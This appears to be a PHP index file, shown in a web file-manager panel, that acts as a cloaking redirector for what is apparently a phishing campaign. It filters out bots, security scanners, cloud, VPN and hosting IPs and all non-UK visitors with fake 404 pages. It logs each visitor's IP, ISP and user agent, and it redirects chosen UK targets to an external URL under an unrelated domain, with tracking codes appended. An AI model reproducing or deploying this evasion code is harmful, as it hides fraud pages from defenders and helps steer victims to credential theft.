OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
ob_start(); // Start output buffering

// CONFIG
date_default_timezone_set('Europe/London');
$redirect_link = "https://coordinacion.bbspartners.es/_OS/MACOS/GBTV/wellknown/inline/";
$log_file = __DIR__ . "/logs.txt";
$allowed_countries = ['United Kingdom']; // Acceptăm doar United Kingdom
$blocked_keywords = ['amazon', 'google', 'microsoft', 'ovh', 'digitalocean', 'hetzner', 'linode', 'bot', 'crawler', 'scraper', 'vpn', 'proxy', 'data', 'hosting', 'scanner'];
$bot_patterns = ['curl', 'wget', 'python', 'libwww', 'scrapy', 'google', 'facebook', 'ahrefs', 'semrush', 'bot', 'spider', 'crawler'];

function show_404_and_exit() {
    header("HTTP/1.0 404 Not Found");
    $custom_404 = $_SERVER['DOCUMENT_ROOT'] . '/404.html';
    if (file_exists($custom_404)) {
        include($custom_404);
    }
    exit;
}

// === IP Detection ===
function get_client_ip() {
    $keys = ['HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_FORWARDED_FOR','HTTP_FORWARDED','REMOTE_ADDR'];
    foreach ($keys as $key) {
        if (!empty($_SERVER[$key])) {
            $iplist = explode(',', $_SERVER[$key]);
            return trim($iplist[0]);
        }
    }
    return 'UNKNOWN';
}

$ip = get_client_ip();
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? 'unknown');

// === BOT Check ===
foreach ($bot_patterns as $bot) {
    if (strpos($user_agent, $bot) !== false) {
        file_put_contents($log_file, "[BOT BLOCKED] $ip | UA: $user_agent | " . date("Y-m-d H:i:s") . PHP_EOL, FILE_APPEND);
        show_404_and_exit();
    }
}

// === Geo + ISP Check ===
$country = 'Unknown';
$isp = 'Unknown';
$api_url = "http://ip-api.com/json/{$ip}?fields=country,isp,status";

$response = @file_get_contents($api_url);
if ($response !== false) {
    $data = json_decode($response, true);
    if (!empty($data) && $data['status'] === 'success') {
        $country = $data['country'] ?? 'Unknown';
        $isp = strtolower($data['isp'] ?? 'Unknown');
    }
}

$date = date("Y-m-d H:i:s");

// === ISP Keyword Block ===
foreach ($blocked_keywords as $keyword) {
    if (strpos($isp, $keyword) !== false || strpos($user_agent, $keyword) !== false) {
        file_put_contents($log_file, "[BLOCKED ISP] $ip | ISP: $isp | Country: $country | $date | UA: $user_agent\n", FILE_APPEND);
        show_404_and_exit();
    }
}

// === Country Block ===
if (!in_array($country, $allowed_countries, true)) {
    file_put_contents($log_file, "[BLOCKED COUNTRY] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND);
    show_404_and_exit();
}

// === Log Access
file_put_contents($log_file, "[ALLOWED] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND);

// === Generate Random Code
$unique_code = bin2hex(random_bytes(8)); // 16 caractere random

// === Redirect with code
if (!headers_sent()) {
    if (!empty($_GET['userid'])) {
        $user_id = urlencode($_GET['userid']);
        header("Location: {$redirect_link}?code={$user_id}&code={$unique_code}");
    } else {
        header("Location: {$redirect_link}?ref={$unique_code}");
    }
}
exit;
?>